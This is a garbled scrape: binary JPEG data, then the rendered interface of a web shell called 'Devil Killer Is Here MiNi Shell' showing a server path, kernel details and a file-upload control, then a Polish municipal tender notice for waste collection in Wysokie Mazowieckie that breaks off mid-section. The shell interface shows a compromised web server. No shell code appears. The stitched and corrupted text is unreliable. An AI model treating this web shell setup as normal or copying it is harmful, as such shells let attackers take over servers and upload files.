JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20211122/0027824201-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonanie usługi polegającej na odbieraniu i zagospodarowaniu odpadów komunalnych od właścicieli nieruchomości zamieszkałych z terenu Miasta Wysokie Mazowieckie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miejska Wysokie Mazowieckie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 450670143</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Ludowa 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wysokie Mazowieckie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">18-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL842 - Łomżyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">862752592</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@wysokiemazowieckie.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wysokiemazowieckie.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie usługi polegającej na odbieraniu i zagospodarowaniu odpadów komunalnych od właścicieli nieruchomości zamieszkałych z terenu Miasta Wysokie Mazowieckie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7d34deae-4b7b-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00278242</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00005909/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych na terenie miasta Wysokie Mazowieckie.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip-umwysokiemaz.wrotapodlasia.pl/zamowieniap/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja odbywa się elektronicznie przy użyciu miniPortalu https://miniportal.uzp.gov.pl/ i ePUAPu https://epuap.gov.pl/wps/portal oraz poczty elektronicznej sekretariat@wysokiemazowieckie.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, zobowiązany jest posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: <br/>1)	„złożenia, zmiany, wycofania oferty lub wniosku” oraz <br/>2) ,,formularza do komunikacji”.<br/>2.	Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy użyciu formularzy opisane zostały w Regulaminie korzystania z miniPortalu oraz Regulaminie ePUAP. <br/>3.	Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty lub wniosku oraz do komunikacji wynosi 150 MB. <br/>4.	Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP. <br/>5.Dane postępowanie można wyszukać na Liście wszystkich postępowań w miniPortalu klikając <br/> wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania. <br/>6. Strona postępowania na miniPrtal: miniportal.uzp.gov.pl/Postepowania <br/>7. Niezbędne wymagania sprzętowo-aplikacyjne umożliwiające pracę na Platformie: <br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 2 mb/s, <br/>2) komputer klasy PC lub lub Mac, o następującej konfiguracji: pamięć RAM min. 4 GB, procesor Intel IV 4GHz, jeden z systemów operacyjnych: MS Windows 7, Mac OS x 10.4, Linux, lub ich nowsze wersje, <br/>3) zainstalowana dowolna najnowsza wersja przeglądarki internetowej (w przypadku Internet Explorer minimalnie wersja 11.0.), <br/>4) włączona obsługa JavaScript, <br/>5) zainstalowany program obsługujący stosowane przez wykonawcę formaty plików (np. Acrobat Reader dla plików w formacie .pdf, pakiet Office lub równoważny),<br/>6)	Zamawiający dopuszcza przesyłanie plików w formatach danych określonych w rozporządzeniu Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (t.j. Dz. U. z 2017 r. poz. 2247) – w szczególności w formatach: .pdf, .doc, .docx, .rtf lub .odt. pades, xades. Zamawiający zaleca przesyłanie plików w formacie .pdf. <br/>7)	Zalecenia Zamawiającego dotyczące kwalifikowanego podpisu elektronicznego: <br/>a)	dla dokumentów w formacie .pdf zaleca się zastosowanie podpisu w formacie PAdES, <br/>b)	dla dokumentów w formacie innym niż .pdf zaleca się zastosowanie podpisu wewnętrznego w formacie XAdES. Wykonawca zobowiązany jest załączyć plik z dokumentem oraz plik z podpisem, czyli 2 pliki. <br/>8. Wykonawca może zwrócić się do Zamawiającego za pośrednictwem poczty elektronicznej : sekretariat@wysokiemazowieckieipl z wnioskiem o wyjaśnienie treści SWZ. Zamawiający udzieli wyjaśnień niezwłocznie , jednak nie później niż na 2 dni przed upływem terminu składania ofert, udostępniając je na stronie internetowej prowadzonego postepowania, pod warunkiem, że wniosek o wyjaśnienie treści SWZ wpłynął do Zamawiającego nie później niż na 4 dni przed upływem terminu składania ofert. <br/>Zamawiający nie ma obowiązku udzielania wyjaśnień SWZ oraz przedłużania terminu składania ofert. Przedłużenie terminu składania ofert nie wpływa na bieg terminu składania wniosku o wyjaśnienie treści SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>1)	administratorem Pani/Pana danych osobowych jest Gmina Miejska w Wysokiem Mazowieckiem, adres – ul. Ludowa 15, 18-200 Wysokie Mazowieckie, woj. podlaskie; <br/>2)	z inspektorem ochrony danych osobowych można skontaktować się: tel. 862752592, e-mail: sekretariat@wysokiemazowieckie.pl; <br/>3)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego p.t. „Dostawa energii elektrycznej w ilości 1 422 876 kWh na potrzeby Gminy Miejskiej Wysokie Mazowieckie”<br/>4)	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. – Prawo zamówień publicznych (Dz. U. z 2017 r. poz. 1579 i 2018), dalej „ustawa Pzp”; <br/>5)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>7)	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8)	posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9)	nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">MK.271.16.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest odbiór odpadów komunalnych z terenu Miasta Wysokie Mazowieckie od właścicieli nieruchomości zamieszkałych oraz ich zagospodarowanie. Przewidywana ilość wytworzonych odpadów komunalnych, którą trzeba będzie odebrać i zagospodarować w okresie objętym przetargiem szacuje się na 2244,00 Mg <br/>2.	Na terenie Miasta Wysokie Mazowieckie z terenu nieruchomości zamieszkałych w okresie objętym przedmiotem zamówienia szacuje się następujące ilości odpadów komunalnych (ilości podane w Mg):<br/>20 03 01 – Niesegregowane (zmieszane) odpady komunalne – 1 852,00<br/>15 01 01– Opakowania papierowe – 70,00<br/>15 01 02; 20 01 39 - Opakowania z tworzyw sztucznych, tworzywa sztuczne - 63,00<br/>15 01 04;–, metale –36,00<br/>15 01 07;– Opakowania ze szkła, szkło – 45,00<br/>20 01 08; 20 02 01 – Odpady zielone - 130,00<br/>20 03 07;- Odpady wielkogabarytowe – 42,00<br/>20 01 36;- Zużyte urządzenia elektryczne i elektroniczne- 6,00<br/>Szacunkowa liczba nieruchomości objętych systemem gospodarowania odpadami 1 397<br/>Szczegółowy wykaz właścicieli nieruchomości, z których odbierane będą stałe odpady komunalne Zamawiający przekaże Wykonawcy w terminie nie później niż 3 dni od podpisania umowy. Zamawiający dopuszcza możliwość zwiększenia lub zmniejszenia liczby obsługiwanych nieruchomości o 20%, bez zmiany warunków wynagrodzenia.<br/>Długość dróg w mieście Wysokie Mazowieckie z podziałem na rodzaj Zarządcy przedstawia się następująco:<br/>Ulice gminne – 25,64 km<br/>Drogi powiatowe – 6,235 km<br/>Drogi wojewódzkie i krajowe – 5,90 km<br/>Razem: 37,775 km<br/><br/>Częstotliwość i sposób odbioru poszczególnych frakcji odpadów komunalnych określa:<br/>•	Uchwała nr XXX/168/2021 Rady Miasta Wysokie Mazowieckie z dnia 29 września 2021 r. w sprawie regulaminu utrzymania czystości i porządku w mieście Wysokie Mazowieckie oraz <br/>•	Uchwała nr XXIII/85/16 Rady Miasta Wysokie Mazowieckie z dnia 27 czerwca 2016 r. w sprawie szczegółowego sposobu i zakresu świadczonych usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów w zamian za uiszczoną przez właściciela nieruchomości opłatę za gospodarowanie odpadami komunalnymi<br/><br/>3.	W zakres przedmiotu zamówienia wchodzi:<br/>a)	Odbieranie od właścicieli nieruchomości z terenu miasta Wysokie Mazowieckie następujących rodzajów odpadów:<br/>•	zmieszanych odpadów komunalnych w zabudowie wielorodzinnej 3 razy w tygodniu, w zabudowie jednorodzinnej 2 razy w miesiącu-,<br/>•	odpadów ulegających biodegradacji, zielonych- raz w tygodniu w zabudowie wielorodzinnej, raz na 2 tygodnie w zabudowie jednorodzinnej,<br/>•	papieru i tektury – nie rzadziej niż raz w tygodniu w zabudowie wielorodzinnej oraz nie rzadziej niż dwa razy w miesiącu w zabudowie jednorodzinnej,<br/>•	szkła kolorowego – nie rzadziej niż raz w tygodniu w zabudowie wielorodzinnej oraz nie rzadziej niż dwa razy w miesiącu w zabudowie jednorodzinnej,<br/>•	szkła bezbarwnego – nie rzadziej niż raz w tygodniu w zabudowie wielorodzinnej oraz nie rzadziej niż dwa razy w miesiącu w zabudowie jednorodzinnej,<br/>•	tworzyw sztucznych, metali oraz opakowań wielomateriałowych – nie rzadziej niż raz w tygodniu w zabudowie wielorodzinnej oraz nie rzadziej niż dwa razy w miesiącu w zabudowie jednorodzinnej,<br/>•	odpady wielkogabarytowe, zużyte urządzenia elektryczne i elektroniczne – nie rzadziej niż raz na dwa miesiące.<br/>b)	przygotowanie i prowadzenie punktu selektywnej zbiórki odpadów komunalnych (dalej PSZOK), w którym będą odbierane od mieszkańców następujące rodzaje odpadów:<br/>•	przeterminowane leki ,<br/>•	baterie i akumulatory ,<br/>• zużyty sprzęt elektryczny i elektroniczny ,<br/>•	meble i odpady wielkogabarytowe ,<br/>•	odpady budowlane i rozbiórkowe pochodzące z prowadzenia drobnych prac remontowych do 1 m³,<br/>•	chemikalia, <br/>•	odpady ulegające biodegradacji, zielone,<br/>•	papier i tektura ,<br/>•	odpady opakowaniowe ze szkła w podziale na szkło bezbarwne i kolorowe ,<br/>•	tworzywa sztuczne, metale oraz opakowania wielomateriałowe, <br/>•	zużyte opony,<br/>•	odpadów tekstyliów i odzieży;<br/>•	odpadów niebezpiecznych;<br/>•	odpadów niekwalifikujących się do odpadów medycznych powstałych w gospodarstwie domowym w wyniku przyjmowania produktów leczniczych w formie infekcji i prowadzenia monitoringu poziomu substancji we krwi, w tym igieł i strzykawek.<br/>PSZOK powinien funkcjonować przez cały okres obowiązywania umowy, w dni robocze od poniedziałku do piątku w godzinach od 13:00 do 19:00 <br/>Wykonawca będzie zobowiązany do prowadzenia ewidencji jakościowej i ilościowej przyjmowanych odpadów oraz utrzymania czystości i porządku na terenie PSZOK. Selektywnie zebrane odpady komunalne winny być na bieżąco, po zapełnieniu kontenerów/pojemników bądź segmentu, przekazywane do instalacji odzysku.<br/>Wykonawca będzie zobowiązany do stworzenia w terminie 30 dni od daty podpisania umowy regulaminu określającego zasady funkcjonowania PSZOK, jego treść podlega zatwierdzeniu przez Zamawiającego<br/><br/>c)	Wykonawca zobowiązany będzie do prowadzenia zbiórki z terenów nieruchomości zamieszkałych mebli i odpadów wielkogabarytowych oraz zużytego sprzętu elektrycznego i elektronicznego w terminach określonych dla odbioru odpadów zbieranych selektywnie;<br/>d)	Zagospodarowanie zebranych odpadów komunalnych, w tym zakresie: <br/>•	Przekazywanie odebranych od właścicieli nieruchomości zmieszanych odpadów komunalnych, odpadów zielonych oraz pozostałości z sortowania odpadów komunalnych przeznaczonych do składowania do regionalnych instalacji do przetwarzania odpadów komunalnych wynikających z wojewódzkiego planu gospodarki odpadami komunalnymi dla Województwa Podlaskiego oraz pokrycie kosztów związanych z przyjęciem odpadów do instalacji. Jeżeli odpady odebrane z terenu miasta Wysokie Mazowieckie będą zagospodarowywane w innych instalacji komunalnych niż te wymienione w WPGO dla Województwa Podlaskiego, Wykonawca zobowiązany jest w swojej ofercie, wskazać Zamawiającemu instalacje do których będzie przekazywać odpady. Jeżeli w trakcie trwania umowy Wykonawca zdecyduje się zagospodarowywać odpady w innych instalacjach, niż te wymienione w WPGO lub tych, które wymienił w swojej ofercie, zobowiązany jest niezwłocznie poinformować zamawiającego o tym fakcie.<br/>•	Wykonawca zobowiązany będzie do dostarczenia odpadów na własny koszt do instalacji przewidzianej do zastępczej obsługi w przypadku awarii RIPOK.<br/>•	Przekazywanie odebranych od właścicieli nieruchomości zamieszkałych selektywnie zebranych odpadów komunalnych do instalacji odzysku i unieszkodliwiania odpadów, zgodnie z obowiązującymi przepisami.<br/>•	Wykonawca podczas realizacji zamówienia zapewni osiągnięcie odpowiednich poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami oraz ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania zgodnie z art. 3b i art. 3c ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz.U.2021r. poz. 888 t.j. z późn. zm.). W przypadku nieosiągnięcia poziomów odzysku, recyklingu, przygotowania do ponownego użycia oraz ograniczenia składowania odpadów ulegających biodegradacji, kary nałożone na Gminę będą ponoszone przez Wykonawcę. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90511000-2 - Usługi wywozu odpadów</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90511200-4 - Usługi gromadzenia odpadów pochodzących z gospodarstw domowych</p> <p class="mb-0">90511300-5 - Usługi zbierania śmieci</p> <p class="mb-0">90512000-9 - Usługi transportu odpadów</p> <p class="mb-0">90513100-7 - Usługi wywozu odpadów pochodzących z gospodarstw domowych</p> <p class="mb-0">90533000-2 - Usługi gospodarki odpadami</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami i ich wagami:<br/>•	najniższa cena ofertowa brutto – waga 60 %<br/>•	termin płatności faktury liczony od dnia wpływu do Urzędu Miasta – waga 40 %<br/>2.	Zamawiający będzie dokonywał wyboru oferty według poniższych zasad: <br/>Punktacja według wzoru:<br/>C= (najniższa cena z rozpatrywanych ofert/cena badanej oferty) x 100 x 0,60<br/>C – punktacja badanej oferty<br/>T =( T/Tmax) x 100 x 0,40<br/>T – termin ( ilość dni) płatności faktury liczony od dnia wpływu do Urzędu Miasta badanej oferty<br/>Tmax- termin maksymalny( ilość dni) płatności faktury liczony od dnia wpływu do Urzędu Miasta rozpatrywanych ofert<br/>Zamawiający przyjmuje, że najwyższy Tmax= 60 dni – to termin maksymalnej płatności faktury za który oferent otrzyma 40 pkt<br/>Tmax=30 dni- oferent otrzyma 20 pkt<br/>Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma największą ilość punktów obliczona na podstawie wzoru:<br/>C+T</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności faktury liczony od dnia wpływu do Urzędu Miasta</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału 